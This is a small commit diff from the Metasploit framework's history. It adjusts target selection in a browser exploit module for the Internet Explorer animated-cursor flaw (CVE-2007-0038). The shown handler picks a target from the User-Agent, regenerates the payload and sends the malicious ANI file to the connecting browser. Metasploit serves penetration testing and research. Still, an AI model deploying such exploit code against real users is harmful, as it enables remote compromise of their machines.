Minor updates for targetting
git-svn-id: file:///home/svn/framework3/trunk@4606 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
aba1959d44
commit
b16fc9fd53
|
@ -127,6 +127,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
mytarget = self.target
|
||||
ros = /.*/
|
||||
|
||||
case request.headers['User-Agent']
|
||||
|
@ -187,7 +188,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
|
||||
# Set the requested target
|
||||
if (targ and targets[targ])
|
||||
target = targets[targ]
|
||||
mytarget = targets[targ]
|
||||
end
|
||||
|
||||
# Re-generate the payload, using the explicit target
|
||||
|
@ -196,7 +197,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, generate_ani(p, target), { 'Content-Type' => 'application/octet-stream' })
|
||||
send_response(cli, generate_ani(p, mytarget), { 'Content-Type' => 'application/octet-stream' })
|
||||
|
||||
handler(cli)
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue